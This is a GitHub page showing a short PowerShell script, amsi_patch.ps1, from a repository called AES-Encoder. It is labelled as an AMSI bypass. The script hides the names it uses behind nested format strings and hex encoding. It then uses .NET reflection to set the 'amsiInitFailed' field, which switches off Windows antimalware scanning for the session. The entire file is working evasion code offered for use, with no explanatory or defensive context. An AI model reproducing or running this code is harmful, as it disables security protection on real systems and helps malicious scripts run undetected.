AES-Encoder/amsi_patch.ps1 at main · chainski/AES-Encoder · GitHub

1
2
3
4
5
6
7
# https://github.com/Chainski/AES-Encoder | Amsi Bypass
${byP`Ass} = (-join ([regex]::Matches(("{7}{11}{10}{14}{5}{9}{13}{6}{15}{2}{0}{4}{1}{16}{12}{8}{3}" -f'e2',("{0}{1}"-f '41','6d'),'6',("{2}{0}{1}" -f'9',("{1}{0}"-f '73','6c'),('7'+'46')),'e',('61'+'6'),'6',("{1}{0}{3}{2}"-f'37','5','6',("{1}{2}{0}" -f'65',('97'+'3'),'74')),('95'+'5'),("{3}{2}{0}{1}"-f '6',("{1}{0}"-f('74'+'2'),'e'),'5',("{0}{1}" -f '76',("{0}{1}"-f'5',('6d'+'6')))),'e4','d2','36',("{3}{0}{1}{2}" -f ('41'+'7'),("{1}{0}"-f '46','57'),('f6'+'d'),'e'),("{1}{0}"-f '6e',('d6'+'1')),("{2}{1}{0}" -f("{0}{1}" -f("{0}{1}" -f('46'+'9'),'6'),'f'),'7','1'),'7'), '..') | ForEach-Object { [char]([convert]::ToUInt32(${_}.Value, 16)) }))
${am`si} = [Text.Encoding]::UTF8.GetString((0x61,0x6d,0x73,0x69,0x49,0x6e,0x69,0x74,0x46,0x61,0x69,0x6c,0x65,0x64))
${aS`sEm`BLY} = [Ref].Assembly
${Ty`PE} = ${ASsemB`LY}.GetType(${ByP`A`Ss})
${fIE`ld} = ${t`Ype}.GetField(${A`msi}, ("{3}{2}{4}{0}{1}" -f("{1}{0}" -f 'ti',('S'+'ta')),'c',('on'+'P'),'N',("{1}{0}" -f("{1}{0}"-f', ',("{0}{1}"-f('b'+'li'),'c')),'u')))
${F`IELd}.SetValue(${N`UlL}, ${TR`Ue})